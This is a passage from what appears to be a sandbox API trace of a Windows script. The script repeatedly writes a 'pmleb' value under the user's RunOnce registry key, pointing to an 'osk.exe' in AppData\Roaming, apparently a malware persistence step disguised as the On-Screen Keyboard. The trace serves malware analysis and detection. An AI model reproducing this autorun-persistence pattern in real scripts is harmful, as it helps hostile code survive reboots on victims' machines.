ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.479] SetTimer (hWnd=0x20280, nIDEvent=0x2009, uElapse=0xa, lpTimerFunc=0x0) returned 0x2009 [0077.479] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.586] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.586] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.586] KillTimer (hWnd=0x20280, uIDEvent=0x2009) returned 1 [0077.586] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.586] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.586] IUnknown:Release (This=0x787518) returned 0x1 [0077.587] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.587] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.587] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.587] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.587] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0077.587] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.587] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xb [0077.587] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.588] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0077.588] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.588] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.588] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.588] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.588] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.589] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.589] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.589] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.589] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.589] RegCloseKey (hKey=0x280) returned 0x0 [0077.589] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.589] GetCurrentThreadId () returned 0x544 [0077.589] GetCurrentThreadId () returned 0x544 [0077.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.590] 
SetTimer (hWnd=0x20280, nIDEvent=0x200a, uElapse=0xa, lpTimerFunc=0x0) returned 0x200a [0077.590] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.600] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.600] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.600] KillTimer (hWnd=0x20280, uIDEvent=0x200a) returned 1 [0077.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.600] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.601] IUnknown:Release (This=0x787518) returned 0x1 [0077.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.601] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.601] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, 
wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.601] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.601] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0077.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.601] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xc [0077.602] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.602] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xb [0077.602] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.602] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.602] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.603] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.603] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.603] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.603] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.603] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.603] RegCloseKey (hKey=0x280) returned 0x0 [0077.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.603] GetCurrentThreadId () returned 0x544 [0077.603] GetCurrentThreadId () returned 0x544 [0077.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.604] 
SetTimer (hWnd=0x20280, nIDEvent=0x200b, uElapse=0xa, lpTimerFunc=0x0) returned 0x200b [0077.604] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.616] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.616] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.617] KillTimer (hWnd=0x20280, uIDEvent=0x200b) returned 1 [0077.617] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.617] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.617] IUnknown:Release (This=0x787518) returned 0x1 [0077.617] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.617] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.617] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, 
wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.618] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.618] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.618] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0077.618] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.618] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xd [0077.618] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.619] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xc [0077.619] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.619] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.619] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.619] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.619] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.619] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.620] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 